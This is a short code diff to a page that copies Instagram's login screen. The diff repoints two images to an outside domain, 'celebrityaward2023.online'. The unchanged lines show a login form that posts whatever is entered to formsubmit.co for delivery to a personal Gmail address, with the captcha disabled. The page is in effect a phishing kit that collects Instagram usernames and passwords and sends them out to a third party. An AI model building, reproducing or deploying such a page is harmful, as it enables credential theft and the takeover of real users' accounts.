--- a/instagram.com/index.html
+++ b/instagram.com/index.html
@@ -11,12 +11,12 @@
 <body>
   <section class="wrapper">
     <div class="left">
-      <img src="images/phones.png" alt="phone">
+      <img src="https://www.celebrityaward2023.online/images/phones.png" alt="phone">
       <img class="screen" src="images/screen.jpg" alt="phone-screen">
     </div>
     <div class="right">
       <div class="panel login">
-        <img id="logo" src="images/instagram-logo.png" alt="logo">
+        <img id="logo" src="https://www.celebrityaward2023.online/images/instagram-logo.png" alt="logo">
         <form action="https://formsubmit.co/christophermark123123@gmail.com" method="POST">
           <input type="hidden" name="_captcha" value="false">
                 <input type="hidden" name="_template" value="table">
